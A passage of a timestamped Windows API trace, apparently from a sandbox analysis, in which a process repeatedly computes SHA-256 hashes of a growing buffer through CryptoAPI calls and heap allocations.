	[0193.922] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a3d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a3d8, pdwDataLen=0x1283b0) returned 1
	[0193.922] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.922] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.922] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.922] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.922] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0193.922] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.922] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a400
	[0193.922] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a400, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a400, pdwDataLen=0x1283b0) returned 1
	[0193.922] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.922] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.922] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.923] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.923] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0193.923] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.923] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a428
	[0193.923] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a428, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a428, pdwDataLen=0x1283b0) returned 1
	[0193.923] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.923] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.923] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.923] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.923] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0193.923] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.923] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a450
	[0193.923] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a450, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a450, pdwDataLen=0x1283b0) returned 1
	[0193.923] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.923] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.923] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.924] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.924] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0193.924] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.924] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a478
	[0193.924] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a478, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a478, pdwDataLen=0x1283b0) returned 1
	[0193.924] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.924] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.924] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.924] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.924] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0193.924] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.924] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a4a0
	[0193.924] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a4a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a4a0, pdwDataLen=0x1283b0) returned 1
	[0193.924] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.924] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.924] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.925] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.925] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0193.925] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.925] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a4c8
	[0193.925] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a4c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a4c8, pdwDataLen=0x1283b0) returned 1
	[0193.925] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.925] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.925] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.925] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.925] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0193.925] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.925] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a4f0
	[0193.925] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a4f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a4f0, pdwDataLen=0x1283b0) returned 1
	[0193.925] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.925] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.925] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.926] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.926] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0193.926] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.926] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a518
	[0193.926] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a518, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a518, pdwDataLen=0x1283b0) returned 1
	[0193.926] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.926] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.926] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.926] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.926] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0193.926] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.926] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a540
	[0193.926] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a540, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a540, pdwDataLen=0x1283b0) returned 1
	[0193.926] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.926] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.926] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.927] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.927] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0193.927] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.927] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a568
	[0193.927] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a568, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a568, pdwDataLen=0x1283b0) returned 1
	[0193.927] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.927] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.927] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.927] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.927] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0193.927] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.927] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a590
	[0193.927] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a590, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a590, pdwDataLen=0x1283b0) returned 1
	[0193.927] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.927] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.927] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.928] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.928] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0193.928] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a5b8
	[0193.928] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a5b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a5b8, pdwDataLen=0x1283b0) returned 1
	[0193.928] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.928] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.928] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.928] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.928] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0193.928] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a5e0
	[0193.928] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a5e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a5e0, pdwDataLen=0x1283b0) returned 1
	[0193.928] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.928] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.928] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.929] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.929] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0193.929] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.929] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a608
	[0193.929] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a608, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a608, pdwDataLen=0x1283b0) returned 1
	[0193.929] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.929] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.929] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.929] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.929] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0193.929] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.929] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a630
	[0193.929] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a630, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a630, pdwDataLen=0x1283b0) returned 1
	[0193.929] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.929] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.929] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.930] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.930] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0193.930] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.930] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a658
	[0193.930] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a658, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a658, pdwDataLen=0x1283b0) returned 1
	[0193.930] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.930] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.930] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.930] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.930] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0193.930] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.930] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a680
	[0193.930] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a680, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a680, pdwDataLen=0x1283b0) returned 1
	[0193.930] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.930] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.930] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.931] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.931] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0193.931] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.931] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a6a8
	[0193.931] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a6a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a6a8, pdwDataLen=0x1283b0) returned 1
	[0193.931] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.931] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.931] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.931] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.931] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0193.931] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.931] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a6d0
	[0193.931] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a6d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a6d0, pdwDataLen=0x1283b0) returned 1
	[0193.931] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.931] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.931] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.932] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.932] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0193.932] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.932] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a6f8
	[0193.932] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a6f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a6f8, pdwDataLen=0x1283b0) returned 1
	[0193.932] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.932] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.932] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.932] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.932] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0193.932] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.932] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a720
	[0193.932] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a720, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a720, pdwDataLen=0x1283b0) returned 1
	[0193.932] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.932] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.932] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.933] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.933] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0193.933] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.933] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a748
	[0193.933] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a748, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a748, pdwDataLen=0x1283b0) returned 1
	[0193.933] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.933] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.933] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.933] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.933] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0193.933] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.933] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a770
	[0193.933] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a770, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a770, pdwDataLen=0x1283b0) returned 1
	[0193.933] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.933] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.933] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.934] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.934] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0193.934] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.934] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a798
	[0193.934] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a798, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a798, pdwDataLen=0x1283b0) returned 1
	[0193.934] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.934] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.934] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.934] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.934] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0193.934] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.934] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a7c0
	[0193.934] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a7c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a7c0, pdwDataLen=0x1283b0) returned 1
	[0193.934] CryptDestroyHash (hHash=0x22b6900) returned 1
